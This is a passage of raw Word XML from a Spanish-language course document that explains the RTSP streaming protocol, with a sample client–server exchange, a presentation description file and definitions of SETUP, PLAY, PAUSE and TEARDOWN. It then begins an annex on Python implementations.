    <w:p w:rsidR="000335AC" w:rsidRDefault="000335AC" w:rsidP="000335AC">
      <w:r>
        <w:t>Recuperar contenidos multimedia del servidor: El cliente puede solicitar la descripción de una presentación por HTTP o cualquier otro método. Si la presentación es multicast, la descripción contiene los puertos y las direcciones que serán usados. Si la presentación es unicast el cliente es el que proporciona el destino, por motivos de seguridad.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000335AC" w:rsidRDefault="000335AC" w:rsidP="000335AC">
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000335AC" w:rsidRDefault="000335AC" w:rsidP="000335AC">
      <w:r>
        <w:t>Invitación de un servidor multimedia a una conferencia: Un servidor puede ser invitado a unirse a una conferencia existente en lugar de reproducir la presentación o grabar todo o una parte del contenido. Este modo es útil para aplicaciones de enseñanza distribuida donde diferentes partes de la conferencia van tomando parte en la discusión.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000335AC" w:rsidRDefault="000335AC" w:rsidP="000335AC">
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000335AC" w:rsidRDefault="000335AC" w:rsidP="000335AC">
      <w:r>
        <w:t>Adición multimedia a una presentación existente: Particularmente para presentaciones en vivo, útil si el servidor puede avisar al cliente sobre los nuevos contenidos disponibles.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000335AC" w:rsidRDefault="000335AC" w:rsidP="000335AC">
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000335AC" w:rsidRDefault="000335AC" w:rsidP="000335AC">
      <w:r>
        <w:t>En la siguiente figura se ilustra el esquema de comunicación entre un cliente (Web Browser) y el servidor RTSP (Web Server).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000335AC" w:rsidRDefault="000335AC" w:rsidP="000335AC"/>
    <w:p w:rsidR="000335AC" w:rsidRDefault="000335AC" w:rsidP="000335AC">
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C81553">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4699000" cy="3467100"/>
            <wp:effectExtent l="25400" t="0" r="0" b="0"/>
            <wp:docPr id="6" name="Imagen 6" descr="nte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erchange"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId6"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4699000" cy="3467100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="000335AC" w:rsidRDefault="000335AC" w:rsidP="000335AC"/>
    <w:p w:rsidR="000335AC" w:rsidRDefault="000335AC" w:rsidP="000335AC">
      <w:r>
        <w:t>Interchange</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000335AC" w:rsidRDefault="000335AC" w:rsidP="000335AC">
      <w:r>
        <w:t>1. Web Browser solicita Presentation Description File a Web Server.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000335AC" w:rsidRDefault="000335AC" w:rsidP="000335AC">
      <w:r>
        <w:t>2. Web Server encapsula Presentation Description File en un mensaje HTTP de respuesta y envía el mensaje al Web Browser.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000335AC" w:rsidRDefault="000335AC" w:rsidP="000335AC">
      <w:r>
        <w:t>3. Cuando el Web browser recibe mensaje HTTP de respuesta, invoca a un Media Player (eg. Quicktime) basándose en el campo Payload Type (PT) del mensaje.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000335AC" w:rsidRDefault="000335AC" w:rsidP="000335AC">
      <w:r>
        <w:t>4. Media Player envía una petición RTSP SETUP y Media Server responde RTSP OK.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000335AC" w:rsidRDefault="000335AC" w:rsidP="000335AC">
      <w:r>
        <w:t>5. Media Player envía una petición RTSP PLAY y Media Server responde RTSP OK.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000335AC" w:rsidRDefault="000335AC" w:rsidP="000335AC">
      <w:r>
        <w:t>6. Media Server inicia el streaming de video hacia Media player.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000335AC" w:rsidRDefault="000335AC" w:rsidP="000335AC">
      <w:r>
        <w:t>7. Si usuario desea pausar la transmisión, envía RTSP PAUSE a Media Server y éste responderá RTSP OK.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000335AC" w:rsidRDefault="000335AC" w:rsidP="000335AC">
      <w:r>
        <w:t>8. Cuando el usuario ha terminado, Media player envía RTSP TEARDOWN, a lo que Media server responde RTSP OK.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000335AC" w:rsidRDefault="000335AC" w:rsidP="000335AC">
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000335AC" w:rsidRDefault="000335AC" w:rsidP="000335AC"/>
    <w:p w:rsidR="000335AC" w:rsidRDefault="000335AC" w:rsidP="000335AC">
      <w:r>
        <w:t>A continuación se muestra un ejemplo de intercambio RTSP, entre un cliente (C) y un servidor (S).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000335AC" w:rsidRPr="00622752" w:rsidRDefault="000335AC" w:rsidP="000335AC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00622752">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>C: SETUP movie.Mjpeg RTSP/1.0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000335AC" w:rsidRPr="00622752" w:rsidRDefault="000335AC" w:rsidP="000335AC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00622752">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>C: CSeq: 1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000335AC" w:rsidRPr="00622752" w:rsidRDefault="000335AC" w:rsidP="000335AC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00622752">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>C: Transport: RTP/UDP; client_port= 25000</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S: RTSP/1.0 200 OK</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000335AC" w:rsidRPr="00622752" w:rsidRDefault="000335AC" w:rsidP="000335AC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00622752">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>S: CSeq: 1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000335AC" w:rsidRPr="00622752" w:rsidRDefault="000335AC" w:rsidP="000335AC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00622752">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>S: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C: PLAY movie.Mjpeg RTSP/1.0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000335AC" w:rsidRPr="00622752" w:rsidRDefault="000335AC" w:rsidP="000335AC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00622752">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>C: CSeq: 2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000335AC" w:rsidRPr="00622752" w:rsidRDefault="000335AC" w:rsidP="000335AC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00622752">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>C: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S: RTSP/1.0 200 OK</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000335AC" w:rsidRPr="00622752" w:rsidRDefault="000335AC" w:rsidP="000335AC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00622752">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>S: CSeq: 2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000335AC" w:rsidRPr="00622752" w:rsidRDefault="000335AC" w:rsidP="000335AC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00622752">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>S: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C: PAUSE movie.Mjpeg RTSP/1.0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000335AC" w:rsidRPr="00622752" w:rsidRDefault="000335AC" w:rsidP="000335AC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00622752">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>C: CSeq: 3</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000335AC" w:rsidRPr="00622752" w:rsidRDefault="000335AC" w:rsidP="000335AC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00622752">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>C: Session: 123456</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000335AC" w:rsidRPr="00622752" w:rsidRDefault="000335AC" w:rsidP="000335AC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00622752">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>S: RTSP/1.0 200 OK</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000335AC" w:rsidRPr="00622752" w:rsidRDefault="000335AC" w:rsidP="000335AC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00622752">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>S: CSeq: 3</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000335AC" w:rsidRPr="00622752" w:rsidRDefault="000335AC" w:rsidP="000335AC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00622752">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>S: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C: PLAY movie.Mjpeg RTSP/1.0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000335AC" w:rsidRPr="00622752" w:rsidRDefault="000335AC" w:rsidP="000335AC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00622752">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>C: CSeq: 4</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000335AC" w:rsidRPr="00622752" w:rsidRDefault="000335AC" w:rsidP="000335AC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00622752">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>C: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S: RTSP/1.0 200 OK</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000335AC" w:rsidRPr="00622752" w:rsidRDefault="000335AC" w:rsidP="000335AC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00622752">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>S: CSeq: 4</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000335AC" w:rsidRPr="00622752" w:rsidRDefault="000335AC" w:rsidP="000335AC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00622752">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>S: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C: TEARDOWN movie.Mjpeg RTSP/1.0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000335AC" w:rsidRPr="00622752" w:rsidRDefault="000335AC" w:rsidP="000335AC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00622752">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>C: CSeq: 5</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000335AC" w:rsidRPr="00622752" w:rsidRDefault="000335AC" w:rsidP="000335AC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00622752">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>C: Session: 123456</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000335AC" w:rsidRPr="00622752" w:rsidRDefault="000335AC" w:rsidP="000335AC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="000335AC" w:rsidRPr="00622752" w:rsidRDefault="000335AC" w:rsidP="000335AC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00622752">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>S: RTSP/1.0 200 OK</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000335AC" w:rsidRPr="00622752" w:rsidRDefault="000335AC" w:rsidP="000335AC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00622752">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>S: CSeq: 5</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000335AC" w:rsidRPr="00622752" w:rsidRDefault="000335AC" w:rsidP="000335AC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00622752">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>S: Session: 123456</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000335AC" w:rsidRDefault="000335AC" w:rsidP="000335AC"/>
    <w:p w:rsidR="000335AC" w:rsidRDefault="000335AC" w:rsidP="000335AC">
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000335AC" w:rsidRDefault="000335AC" w:rsidP="000335AC">
      <w:r>
        <w:t>El parámetro Cseq corresponde al Sequence Number, número que aumenta en una unidad por cada petición enviada por el cliente. Session es un número que está fijo durante toda la sesión, y es usado por el servidor para reconocer al cliente. Esto es útil en caso de servidores con múltiples clientes. CSeq y Session permiten al servidor hacer un seguimiento de estado de sesión.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000335AC" w:rsidRDefault="000335AC" w:rsidP="000335AC">
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000335AC" w:rsidRDefault="000335AC" w:rsidP="000335AC">
      <w:r>
        <w:t>El Presentation Description File, que fue mencionado anteriormente, es un archivo que contiene los tipos de compresión y la manera en que se transmite el archivo. En el caso de RTSP, el Presentation Description File contiene la URL que identifica al streaming RTSP, mediante la sintaxis “rtsp://”.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000335AC" w:rsidRDefault="000335AC" w:rsidP="000335AC">
      <w:r>
        <w:t>Un ejemplo de este arhivo se presenta a continuación:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00881E2C" w:rsidRPr="00881E2C" w:rsidRDefault="000335AC" w:rsidP="00881E2C">
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblInd w:w="-35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837"/>
      </w:tblGrid>
      <w:tr w:rsidR="00881E2C" w:rsidRPr="00881E2C">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:trHeight w:val="324"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6837" w:type="dxa"/>
            <w:shd w:val="solid" w:color="595959" w:themeColor="text1" w:themeTint="A6" w:fill="FFFFFF"/>
          </w:tcPr>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&lt;title&gt;Twister&lt;/title&gt;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&lt;session&gt;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&lt;group language=en lipsync&gt;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&lt;switch&gt;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&lt;track type=audio e="PCMU/8000/1" src =</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"rtsp://audio.example.com/twister/audio.en/lofi"&gt;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&lt;track type=audio e="DVI4/16000/2" pt="90 DVI4/8000/1"</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src="rtsp://audio.example.com/twister/audio.en/hifi"&gt;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&lt;/switch&gt;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&lt;track type="video/jpeg" src="rtsp://video.example.com/twister/video"&gt;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&lt;/group&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00881E2C" w:rsidRPr="00881E2C" w:rsidRDefault="00881E2C" w:rsidP="00881E2C">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00881E2C">
              <w:rPr>
                <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>&lt;/session&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00881E2C" w:rsidRPr="00881E2C" w:rsidRDefault="00881E2C" w:rsidP="00881E2C">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00881E2C" w:rsidRDefault="00881E2C" w:rsidP="00881E2C"/>
    <w:p w:rsidR="000335AC" w:rsidRDefault="000335AC" w:rsidP="000335AC"/>
    <w:p w:rsidR="000335AC" w:rsidRDefault="000335AC" w:rsidP="000335AC"/>
    <w:p w:rsidR="000335AC" w:rsidRDefault="000335AC" w:rsidP="000335AC">
      <w:r>
        <w:t>En este ejemplo, el usuario puede elegir entre dos calidades de transmisión de audio (lofi: PCMU/8000/1 o hifi: DVI4/16000/2 para estéreo y 90 DVI4/8000/1 para mono.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000335AC" w:rsidRDefault="000335AC" w:rsidP="000335AC">
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000335AC" w:rsidRDefault="000335AC" w:rsidP="000335AC">
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000335AC" w:rsidRDefault="000335AC" w:rsidP="000335AC">
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000335AC" w:rsidRDefault="000335AC" w:rsidP="000335AC">
      <w:r>
        <w:t>Finalmente se hace una breve descripción del significado de las solicitudes RTSP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000335AC" w:rsidRDefault="000335AC" w:rsidP="000335AC"/>
    <w:p w:rsidR="000335AC" w:rsidRPr="000335AC" w:rsidRDefault="000335AC" w:rsidP="000335AC">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000335AC">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>SETUP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000335AC" w:rsidRDefault="000335AC" w:rsidP="000335AC">
      <w:r>
        <w:t xml:space="preserve">    Especifica cómo debe transportarse un tipo específico de audio o video. La solicitud debe hacerse antes de que se envíe una petición PLAY. El mensaje contiene la dirección URL y un especificador de transporte. La respuesta del servidor usualmente confirma los parámetros elegidos y determina los campos incompletos, como por ejemplo los puertos elegidos por el servidor.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000335AC" w:rsidRDefault="000335AC" w:rsidP="000335AC">
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000335AC" w:rsidRDefault="000335AC" w:rsidP="000335AC"/>
    <w:p w:rsidR="000335AC" w:rsidRPr="000335AC" w:rsidRDefault="000335AC" w:rsidP="000335AC">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000335AC">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>PLAY</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000335AC" w:rsidRDefault="000335AC" w:rsidP="000335AC">
      <w:r>
        <w:t xml:space="preserve">    Permite el envío de un stream multimedia (audio o video). Las solicitudes PLAY pueden acumularse enviando múltiples solicitudes PLAY. La dirección URL puede estar asociada a 1 sólo flujo multimedia o a varios. Debe especificarse un rango de reproducción, en caso contrario el flujo es reproducido de principio a fin. Y en caso de ser pausado, seguirá desde el mismo punto, cuando el cliente reanude la reproducción.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000335AC" w:rsidRDefault="000335AC" w:rsidP="000335AC"/>
    <w:p w:rsidR="000335AC" w:rsidRPr="000335AC" w:rsidRDefault="000335AC" w:rsidP="000335AC">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000335AC">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>PAUSE</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000335AC" w:rsidRDefault="000335AC" w:rsidP="000335AC">
      <w:r>
        <w:t xml:space="preserve">    Detiene temporalmente la reproducción de 1 o más flujos multimedia. Posteriormente se puede reanudar la reproducción mediante la solicitud PLAY. Puede especificarse un rango en la pausa, en caso contrario la pausa será inmediata.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000335AC" w:rsidRDefault="000335AC" w:rsidP="000335AC"/>
    <w:p w:rsidR="000335AC" w:rsidRPr="000335AC" w:rsidRDefault="000335AC" w:rsidP="000335AC">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000335AC">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>TEARDOWN</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000335AC" w:rsidRDefault="000335AC" w:rsidP="000335AC">
      <w:r>
        <w:t xml:space="preserve">    Se utiliza para terminar la sesión. Cuando el cliente envía esta solicitud, el servidor detiene todos los flujos asociados a la sesión, y libera los recursos para su posterior uso.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B76284" w:rsidRDefault="00B76284" w:rsidP="00C84B17"/>
    <w:p w:rsidR="00B76284" w:rsidRDefault="00B76284" w:rsidP="00B76284">
      <w:pPr>
        <w:pStyle w:val="Ttulo4"/>
      </w:pPr>
      <w:r>
        <w:t>Anexo 2: Instalación de Python</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B76284" w:rsidRDefault="00B76284" w:rsidP="00B76284">
      <w:r w:rsidRPr="00B76284">
        <w:rPr>
          <w:i/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Fuente:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Python para todos (Autor: Raúl González Duque)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B76284" w:rsidRPr="00B76284" w:rsidRDefault="00B76284" w:rsidP="00B76284"/>
    <w:p w:rsidR="00B76284" w:rsidRDefault="00B76284" w:rsidP="00B76284">
      <w:r w:rsidRPr="009A4EEE">
        <w:t>Existen varias implementaciones distintas de Python: CPython, Jython, IronPython, PyPy, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B76284" w:rsidRPr="009A4EEE" w:rsidRDefault="00B76284" w:rsidP="00B76284"/>
    <w:p w:rsidR="00B76284" w:rsidRDefault="00B76284" w:rsidP="00B76284">
      <w:r w:rsidRPr="009A4EEE">
        <w:t>CPython es la más utilizada, la más rápida y la má</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">s madura. Cuando la gente habla </w:t>
      </w:r>
      <w:r w:rsidRPr="009A4EEE">
        <w:t>de Python normalmente se refiere a esta implementación. En este caso tanto el intérprete como los módulos están escritos en C.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B76284" w:rsidRPr="009A4EEE" w:rsidRDefault="00B76284" w:rsidP="00B76284"/>
    <w:p w:rsidR="00B76284" w:rsidRDefault="00B76284" w:rsidP="00B76284">
      <w:r w:rsidRPr="009A4EEE">
        <w:t>Jython es la implementación en Java de Python, mientras que IronPython es su contrapartida en C# (.NET). Su interés estriba en que utilizando estas implementaciones se pueden utilizar todas las librerías disponibles para los programadores de Java y .NET.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B76284" w:rsidRPr="009A4EEE" w:rsidRDefault="00B76284" w:rsidP="00B76284"/>
